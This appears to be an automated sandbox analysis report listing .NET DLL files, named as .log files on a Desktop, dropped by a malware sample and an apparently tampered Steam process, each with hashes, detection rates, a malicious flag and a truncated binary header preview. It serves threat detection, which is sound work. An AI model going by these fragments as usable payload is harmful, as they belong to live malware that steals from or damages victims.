                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\Gumzpbgc.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\HLSRUZZF.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\HSbycbvE.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\HWSrgsLR.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\HiqIapca.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\IRjpMTiY.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\ITtzBsaM.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):9728
                                                                  Entropy (8bit):5.0168086460579095
                                                                  Encrypted:false
                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                  C:\Users\user\Desktop\IYriOWqO.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\IaBrEuiC.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\IsFPfNCu.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):9728
                                                                  Entropy (8bit):5.0168086460579095
                                                                  Encrypted:false
                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                  C:\Users\user\Desktop\JxaHDTDN.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\KJWyVjBG.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\KMIinpLK.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):22016
                                                                  Entropy (8bit):5.41854385721431
                                                                  Encrypted:false
                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\KRGQASbM.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\KgJXRbxs.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):22016
                                                                  Entropy (8bit):5.41854385721431
                                                                  Encrypted:false
                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\KkdqwYhV.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\LYhyhmcT.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\LforkokJ.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\MHUibFPy.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\MeZIvNrs.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\MlipEPMs.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
